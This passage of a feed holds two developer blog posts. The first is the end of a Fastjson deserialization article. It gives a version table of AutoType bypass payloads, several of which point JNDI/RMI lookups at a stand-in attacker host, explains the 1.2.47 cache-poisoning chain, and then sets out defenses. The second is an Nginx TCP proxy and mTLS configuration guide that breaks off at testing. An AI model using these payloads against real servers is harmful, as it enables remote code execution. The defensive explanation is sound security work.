&lt;td&gt;&lt;code&gt;{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://attacker-ip:1099/malicious-class","autoCommit":true}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requires server to enable &lt;code&gt;setAutoTypeSupport(true)&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.42&lt;/td&gt;
&lt;td&gt;Double L; Bypass&lt;/td&gt;
&lt;td&gt;Double L and ; (LL…;;)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://attacker-ip:1099/malicious-class","autoCommit":true}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Exploits single-filter flaw; auto-truncates after double characters&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.43&lt;/td&gt;
&lt;td&gt;[Symbol Bypass&lt;/td&gt;
&lt;td&gt;Prefix class name with [, suffix with [{ to close&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"[com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"[{,"_bytecodes":["Base64-encoded malicious bytecode"]}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requires &lt;code&gt;Feature.SupportNonPublicField&lt;/code&gt; to inject private properties&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.45&lt;/td&gt;
&lt;td&gt;MyBatis Class Bypass&lt;/td&gt;
&lt;td&gt;Exploit &lt;code&gt;JndiDataSourceFactory&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://attacker-ip:1099/malicious-class"}}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requires MyBatis dependency in the project&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.47 and earlier&lt;/td&gt;
&lt;td&gt;Cache Poisoning Bypass&lt;/td&gt;
&lt;td&gt;Cache malicious class in _classMappings first&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker-ip:1099/malicious-class"}}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AutoType not required; cache skips blacklist checks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.80 and earlier&lt;/td&gt;
&lt;td&gt;$ref Reference Chain Bypass&lt;/td&gt;
&lt;td&gt;Use $ref to construct exception object chain&lt;/td&gt;
&lt;td&gt;(CVE-2022-25845) &lt;code&gt;{"@type":"java.lang.Exception","@ref":"$..xx"}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Triggers class loading via exception handling logic&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Key Bypass Analysis (Cache Poisoning in 1.2.47)
&lt;/h3&gt;

&lt;p&gt;This is one of the most dangerous bypass methods—it &lt;strong&gt;does not require AutoType activation&lt;/strong&gt; and bypasses blacklists solely via caching. The core logic is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; First JSON object (a): Use the &lt;code&gt;val&lt;/code&gt; field of &lt;code&gt;java.lang.Class&lt;/code&gt; to store &lt;code&gt;com.sun.rowset.JdbcRowSetImpl&lt;/code&gt; in Fastjson’s &lt;code&gt;_classMappings&lt;/code&gt; cache.&lt;/li&gt;
&lt;li&gt; Second JSON object (b): Directly specify the cached class via &lt;code&gt;@type&lt;/code&gt;. Fastjson skips blacklist checks, loads the class, and triggers JNDI injection.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In practice, attackers only need to send the above JSON string. If the target server uses version 1.2.47 or earlier, malicious code will execute.&lt;/p&gt;

&lt;h2&gt;
  
  
  IV. Enterprise-Grade Defense Strategies: Block Vulnerabilities at the Source
&lt;/h2&gt;

&lt;p&gt;Defense against Fastjson vulnerabilities centers on &lt;strong&gt;disabling risky features + timely updates + strict validation&lt;/strong&gt;. Below are 4 actionable key measures:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Mandatorily Upgrade to Secure Versions
&lt;/h3&gt;

&lt;p&gt;This is the most fundamental defense. According to official announcements:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  For 1.x series: Upgrade to &lt;strong&gt;1.2.83 or later&lt;/strong&gt; (patches all known bypass vulnerabilities).&lt;/li&gt;
&lt;li&gt;  For 2.x series: Upgrade to &lt;strong&gt;2.0.45 or later&lt;/strong&gt; (the 2.x series redesigned the AutoType mechanism for enhanced security).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2. Disable the AutoType Mechanism (Critical Configuration)
&lt;/h3&gt;

&lt;p&gt;Even after upgrading, disable AutoType unless absolutely necessary. There are 3 configuration methods:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Code Configuration&lt;/strong&gt; (global effect): &lt;code&gt;// Disable AutoType to block @type parsing ParserConfig.getGlobalInstance().setAutoTypeSupport(false);&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;JVM Parameter Configuration&lt;/strong&gt; (takes effect on startup):bash&lt;code&gt;-Dfastjson.autoTypeSupport=false&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Configuration File&lt;/strong&gt; (for frameworks like Spring):Add to &lt;code&gt;application.properties&lt;/code&gt;:properties&lt;code&gt;fastjson.autoTypeSupport=false&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3. Enable SafeMode (Completely Block AutoType)
&lt;/h3&gt;

&lt;p&gt;If your business does not require AutoType, enable &lt;strong&gt;SafeMode&lt;/strong&gt;. This completely disables &lt;code&gt;@type&lt;/code&gt; parsing—even with whitelists configured, custom classes cannot be loaded.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Enable SafeMode to fundamentally disable AutoType
ParserConfig.getGlobalInstance().setSafeMode(true);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4. Whitelist Configuration (If Absolutely Necessary)
&lt;/h3&gt;

&lt;p&gt;If your business must enable AutoType, configure a strict whitelist (only allow specified classes to be parsed) and avoid wildcards (e.g., &lt;code&gt;com.company.*&lt;/code&gt;).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ParserConfig config = ParserConfig.getGlobalInstance();
// Add whitelist: Only allow classes under org.example
config.addAccept("org.example.");
// Avoid blacklists (easily bypassed; prioritize whitelists)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  V. Frequently Asked Questions (FAQ)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Q1: Why is &lt;code&gt;Feature.SupportNonPublicField&lt;/code&gt; required for deserializing &lt;code&gt;TemplatesImpl&lt;/code&gt;?
&lt;/h3&gt;

&lt;p&gt;A: The &lt;code&gt;_bytecodes&lt;/code&gt; field of &lt;code&gt;TemplatesImpl&lt;/code&gt; (which stores malicious bytecode) is private. Fastjson does not parse private properties by default. Adding this feature allows injection of Base64-encoded malicious bytecode into &lt;code&gt;_bytecodes&lt;/code&gt;, triggering subsequent code execution.&lt;/p&gt;

&lt;h3&gt;
  
  
  Q2: Why must &lt;code&gt;@type&lt;/code&gt; be the first field in the JSON?
&lt;/h3&gt;

&lt;p&gt;A: Fastjson prioritizes processing the &lt;code&gt;@type&lt;/code&gt; field during parsing. If placed later, parsing other fields may trigger exceptions (e.g., type mismatch), preventing &lt;code&gt;@type&lt;/code&gt; from being processed and rendering the payload ineffective.&lt;/p&gt;

&lt;h3&gt;
  
  
  Q3: How to quickly check if a project uses a vulnerable Fastjson version?
&lt;/h3&gt;

&lt;p&gt;A: 1. Check the dependency version in &lt;code&gt;pom.xml&lt;/code&gt; or &lt;code&gt;build.gradle&lt;/code&gt;; 2. Use tools like the Maven Dependency Plugin to view the dependency tree:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mvn dependency:tree | grep fastjson
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Fastjson vulnerabilities arise from the combination of &lt;strong&gt;over-trusting user input&lt;/strong&gt; and &lt;strong&gt;security flaws in the AutoType mechanism&lt;/strong&gt;. For developers, there’s no need to deeply study every bypass technique—simply remember three principles: &lt;strong&gt;avoid vulnerable versions, disable AutoType, and enable SafeMode&lt;/strong&gt;. These measures block vulnerabilities at the source and prevent your systems from becoming attacker targets.&lt;/p&gt;

</description>
      <category>java</category>
      <category>fastjson</category>
      <category>deserialization</category>
    </item>
    <item>
      <title>NGINX Technical Practice: Configuration Guide for TCP Layer 4 Port Proxy and mTLS Mutual Encryption Authentication</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Sun, 23 Nov 2025 15:41:28 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/nginx-technical-practice-configuration-guide-for-tcp-layer-4-port-proxy-and-mtls-mutual-encryption-3flb</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/nginx-technical-practice-configuration-guide-for-tcp-layer-4-port-proxy-and-mtls-mutual-encryption-3flb</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This article systematically breaks down the complete implementation of Nginx TCP Layer 4 port proxy and mTLS mutual encryption authentication. It covers core technical principles (TLS/mTLS mechanisms), certificate generation (root CA/server/client workflows), Nginx configuration (Stream module, SSL parameter optimization), and function verification (valid/invalid connection testing) with practical commands. It helps DevOps engineers and developers quickly build secure communication channels, addressing risks like data leakage and unauthorized access in traditional proxy architectures, suitable for encrypted proxy scenarios of TCP services such as Redis and databases.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/nginx-technical-practice-configuration-guide-for-tcp-layer-4-port-proxy-and-mtls-mutual-encryption-authentication.html" rel="noopener noreferrer"&gt;# NGINX Technical Practice: Configuration Guide for TCP Layer 4 Port Proxy and mTLS Mutual Encryption Authentication&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Exploring the Technical Background
&lt;/h2&gt;

&lt;p&gt;In the process of digital transformation, network security and efficient proxy technology have become core components of modern network architectures. As enterprises expand their business scales and business scenarios become more complex, network communications face multiple security threats such as man-in-the-middle attacks, data theft, and information tampering, placing higher demands on the security and reliability of communication architectures.&lt;/p&gt;

&lt;p&gt;Traditional network proxy solutions have limitations in addressing complex security scenarios. As a high-performance HTTP and reverse proxy server, Nginx occupies a crucial position in the proxy field due to its stability, efficiency, and rich functional modules. Nginx not only supports Layer 7 proxy for the HTTP protocol but also enables Layer 4 proxy for TCP and UDP protocols through the Stream module, providing a flexible and high-performance solution for network communications.&lt;/p&gt;

&lt;p&gt;mTLS (mutual TLS) mutual encryption authentication technology is a key means to ensure secure network communications. Traditional one-way TLS authentication only enables the client to authenticate the server’s identity, posing the risk of attackers impersonating legitimate servers to steal data. mTLS mutual authentication requires both communicating parties to verify each other’s identities. Through a certificate verification mechanism, it ensures the legitimacy of both parties’identities, effectively preventing man-in-the-middle attacks and data leakage, and safeguarding the confidentiality, integrity, and availability of data transmission.&lt;/p&gt;

&lt;p&gt;In data-sensitive industries—such as scenarios like customer transaction information processing in the financial sector, private medical record transmission in the healthcare industry, and user information protection on e-commerce platforms—the combined application of Nginx TCP Layer 4 proxy and mTLS mutual authentication holds significant importance. This technical combination not only meets enterprises’demands for network communication performance but also provides comprehensive protection for data security, serving as a core technical support for safeguarding network architecture security during enterprises’digital transformation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdvsp0e3208u90yrihf78.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdvsp0e3208u90yrihf78.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Nginx Proxy for TCP Layer 4 Ports
&lt;/h2&gt;

&lt;h3&gt;
  
  
  2.1 Preparation
&lt;/h3&gt;

&lt;p&gt;Before configuring the Nginx TCP Layer 4 port proxy, ensure that Nginx has been installed on the server. For Ubuntu systems, the installation can be performed using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt update &amp;amp;&amp;amp; sudo apt install nginx -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For CentOS systems, the yum command is used for installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo yum install epel-release -y &amp;amp;&amp;amp; sudo yum install nginx -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Meanwhile, the OpenSSL dependency library must be installed to provide SSL/TLS encryption support, which is a prerequisite for the subsequent mTLS mutual authentication configuration. The installation command for Ubuntu systems is as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt install openssl -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Installation command for CentOS systems:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo yum install openssl -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After installation, run the &lt;code&gt;nginx -V&lt;/code&gt; command to check the Nginx compilation parameters and confirm whether the &lt;code&gt;--with-stream&lt;/code&gt; module is included. This module is the core component for implementing TCP/UDP Layer 4 proxy; if it is missing, Nginx needs to be recompiled with this parameter added.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Detailed Configuration Steps
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create a dedicated Stream configuration directory&lt;/strong&gt;To maintain the clarity and manageability of the Nginx configuration structure, create a dedicated directory for storing Stream module configuration files:
1.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo mkdir -p /etc/nginx/stream.d
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Modify the main Nginx configuration file&lt;/strong&gt;Edit the main Nginx configuration file (&lt;code&gt;/etc/nginx/nginx.conf&lt;/code&gt;) and add an entry to include the Stream configuration directory at the end of the file. This ensures that Nginx loads the TCP proxy configuration when starting up:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Add the following content at the end of /etc/nginx/nginx.conf
stream {include /etc/nginx/stream.d/*.conf;}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Configure the TCP Layer 4 proxy&lt;/strong&gt;Create a TCP proxy configuration file (e.g., &lt;code&gt;redis-proxy.conf&lt;/code&gt;) in the &lt;code&gt;/etc/nginx/stream.d&lt;/code&gt; directory. Taking the proxy for a Redis service (running on &lt;code&gt;192.168.1.100:6379&lt;/code&gt;) as an example, the configuration content is as follows:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;upstream redis_backend {
    server 192.168.1.100:6379; # Backend Redis service address and port
    keepalive 32; # Maintain persistent connections to improve performance
}

server {
    listen 6380; # Port on which Nginx listens for TCP requests
    proxy_pass redis_backend; # Forward requests to the backend upstream cluster
    proxy_timeout 300s; # Set the proxy connection timeout period
    proxy_buffer_size 16k; # Set the proxy buffer size
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 Configuration Example Demonstration
&lt;/h3&gt;

&lt;p&gt;After completing the configuration, verify the correctness of the Nginx configuration using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo nginx -t
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the output shows &lt;code&gt;nginx: configuration file /etc/nginx/nginx.conf test is successful&lt;/code&gt;, the configuration is valid. Then, reload the Nginx configuration to make the changes take effect:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo systemctl reload nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To confirm that the TCP proxy port is listening normally, run the &lt;code&gt;ss&lt;/code&gt; command to check the port status:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ss -tulnp | grep 6380
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the output includes &lt;code&gt;LISTEN 0 128 *:6380 *:* users:(("nginx",pid=xxxx,fd=xx))&lt;/code&gt;, it indicates that the Nginx TCP Layer 4 proxy has been started successfully.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Enabling mTLS Mutual Encryption Authentication
&lt;/h2&gt;

&lt;h3&gt;
  
  
  3.1 Analysis of mTLS Principles
&lt;/h3&gt;

&lt;p&gt;mTLS (mutual TLS) extends the security mechanism of traditional one-way TLS by requiring both the client and the server to present and verify each other’s digital certificates during the TLS handshake process. This two-way identity verification ensures that:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; The client can confirm that the connected server is a legitimate target (preventing man-in-the-middle attacks by fake servers);&lt;/li&gt;
&lt;li&gt; The server can verify that the accessing client has the required access permissions (avoiding unauthorized access by malicious clients).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The core principle of mTLS relies on a trusted certificate chain: both parties’certificates are issued by a trusted Certificate Authority (CA). During authentication, each party verifies the validity of the other’s certificate (including checking the certificate’s expiration date, signature integrity, and whether it has been revoked) to confirm the other’s identity.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Generating Certificates and Keys
&lt;/h3&gt;

&lt;p&gt;This section uses the CFSSL tool (a command-line toolset for TLS/SSL certificate management) to generate the required certificates for mTLS, including the root CA certificate, server certificate, and client certificate.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.2.1 Installing the CFSSL Tool
&lt;/h4&gt;

&lt;p&gt;Download and install the CFSSL toolset in the &lt;code&gt;/usr/local/bin&lt;/code&gt; directory (applicable to Linux x86_64 systems):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wget -q -O /usr/local/bin/cfssl https://github.com/cloudflare/cfssl/releases/download/v1.6.4/cfssl_1.6.4_linux_amd64
wget -q -O /usr/local/bin/cfssljson https://github.com/cloudflare/cfssl/releases/download/v1.6.4/cfssljson_1.6.4_linux_amd64
wget -q -O /usr/local/bin/cfssl-certinfo https://github.com/cloudflare/cfssl/releases/download/v1.6.4/cfssl-certinfo_1.6.4_linux_amd64

# Add executable permissions to the tools
chmod +x /usr/local/bin/cfssl /usr/local/bin/cfssljson /usr/local/bin/cfssl-certinfo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Verify the installation by running &lt;code&gt;cfssl version&lt;/code&gt;; a version number output indicates successful installation.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.2.2 Generating the Root CA Certificate
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create a CA configuration directory&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mkdir -p /etc/nginx/certs &amp;amp;&amp;amp; cd /etc/nginx/certs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create the CA policy file (&lt;code&gt;ca-config.json&lt;/code&gt;)&lt;/strong&gt; This file defines the validity period and usage scope of the certificates issued by the CA:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
    "signing": {
        "default": {"expiry": "87600h" # Root CA validity period (10 years)
        },
        "profiles": {
            "server": {"expiry": "43800h", # Server certificate validity period (5 years)
                "usages": [
                    "signing",
                    "key encipherment",
                    "server auth" # Certificate usage: server authentication
                ]
            },
            "client": {"expiry": "43800h", # Client certificate validity period (5 years)
                "usages": [
                    "signing",
                    "key encipherment",
                    "client auth" # Certificate usage: client authentication
                ]
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create the CA certificate signing request (CSR) configuration file (&lt;code&gt;ca-csr.json&lt;/code&gt;)&lt;/strong&gt; This file contains the basic information of the root CA (such as organization name and region):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
    "CN": "MyEnterpriseRootCA", # Common Name of the root CA
    "key": {
        "algo": "rsa", # Encryption algorithm: RSA
        "size": 2048 # Key length: 2048 bits
    },
    "names": [
        {
            "C": "CN", # Country/Region
            "L": "Beijing", # City
            "ST": "Beijing", # Province/State
            "O": "MyEnterprise", # Organization name
            "OU": "IT Department" # Organizational Unit
        }
    ],
    "ca": {"expiry": "87600h"}
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Generate the root CA certificate and private key&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cfssl gencert -initca ca-csr.json | cfssljson -bare ca
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After execution, the following files will be generated in the current directory:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;ca.pem&lt;/code&gt;: Root CA public certificate (used to verify server/client certificates)&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;ca-key.pem&lt;/code&gt;: Root CA private key (used to sign server/client certificates; keep it secure)&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;ca.csr&lt;/code&gt;: CA certificate signing request file (for reference only)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.2.3 Generating the Server Certificate
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create the server CSR configuration file (&lt;code&gt;server-csr.json&lt;/code&gt;)&lt;/strong&gt; Note that the &lt;code&gt;hosts&lt;/code&gt; field must include the actual domain name or IP address of the Nginx server (to ensure certificate domain verification passes):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{"CN": "nginx-proxy.example.com", # Common Name of the server (consistent with the access domain name)
    "key": {
        "algo": "rsa",
        "size": 2048
    },
    "names": [
        {
            "C": "CN",
            "L": "Beijing",
            "ST": "Beijing",
            "O": "MyEnterprise",
            "OU": "IT Department"
        }
    ],
    "hosts": [
        "127.0.0.1",
        "192.168.1.200", # Nginx server IP address
        "nginx-proxy.example.com" # Nginx server domain name
    ]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Generate the server certificate and private key&lt;/strong&gt;Use the root CA to sign the server certificate:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cfssl gencert -ca=ca.pem -ca-key=ca-key.pem -config=ca-config.json -profile=server server-csr.json | cfssljson -bare server
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generated files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;server.pem&lt;/code&gt;: Server public certificate&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;server-key.pem&lt;/code&gt;: Server private key&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.2.4 Generating the Client Certificate
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create the client CSR configuration file (&lt;code&gt;client-csr.json&lt;/code&gt;)&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{"CN": "mtls-client-001", # Client identifier (can be customized, e.g., client ID)
    "key": {
        "algo": "rsa",
        "size": 2048
    },
    "names": [
        {
            "C": "CN",
            "L": "Beijing",
            "ST": "Beijing",
            "O": "MyEnterprise",
            "OU": "Operations Department"
        }
    ]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Generate the client certificate and private key&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cfssl gencert -ca=ca.pem -ca-key=ca-key.pem -config=ca-config.json -profile=client client-csr.json | cfssljson -bare client
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generated files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;client.pem&lt;/code&gt;: Client public certificate&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;client-key.pem&lt;/code&gt;: Client private key&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.2.5 Verifying Certificate Validity
&lt;/h4&gt;

&lt;p&gt;Use the &lt;code&gt;openssl&lt;/code&gt; command to verify the integrity of the generated certificates and the validity of the certificate chain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Verify the server certificate (using the root CA)
openssl verify -CAfile ca.pem server.pem

# Verify the client certificate (using the root CA)
openssl verify -CAfile ca.pem client.pem
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the output shows &lt;code&gt;server.pem: OK&lt;/code&gt; and &lt;code&gt;client.pem: OK&lt;/code&gt;, the certificates are valid and the certificate chain is intact.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.3 Configuring mTLS
&lt;/h3&gt;

&lt;p&gt;Modify the Nginx TCP proxy configuration file (&lt;code&gt;/etc/nginx/stream.d/redis-proxy.conf&lt;/code&gt;) to enable mTLS mutual authentication. The updated configuration is as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;upstream redis_backend {
    server 192.168.1.100:6379;
    keepalive 32;
}

server {
    listen 6380 ssl; # Enable SSL for the listening port

    # Server certificate configuration
    ssl_certificate /etc/nginx/certs/server.pem; # Server public certificate path
    ssl_certificate_key /etc/nginx/certs/server-key.pem; # Server private key path

    # mTLS client authentication configuration
    ssl_client_certificate /etc/nginx/certs/ca.pem; # Root CA certificate (used to verify client certificates)
    ssl_verify_client on; # Enable client certificate verification (mandatory)
    # ssl_verify_depth 2; # Set the certificate verification depth (default is 1; adjust if using intermediate CAs)

    # SSL/TLS security optimization parameters
    ssl_protocols TLSv1.2 TLSv1.3; # Disable insecure protocols (e.g., TLSv1.0, TLSv1.1)
    ssl_prefer_server_ciphers on; # Prioritize server-side cipher suites
    ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH"; # Secure cipher suite list

    # Proxy forwarding configuration
    proxy_pass redis_backend;
    proxy_timeout 300s;
    proxy_buffer_size 16k;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After modifying the configuration, verify and reload Nginx:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo nginx -t &amp;amp;&amp;amp; sudo systemctl reload nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. Configuration Verification and Testing
&lt;/h2&gt;

&lt;h3&gt;
  
  
  4.1 Checking Configuration Correctness
&lt;/h3&gt;

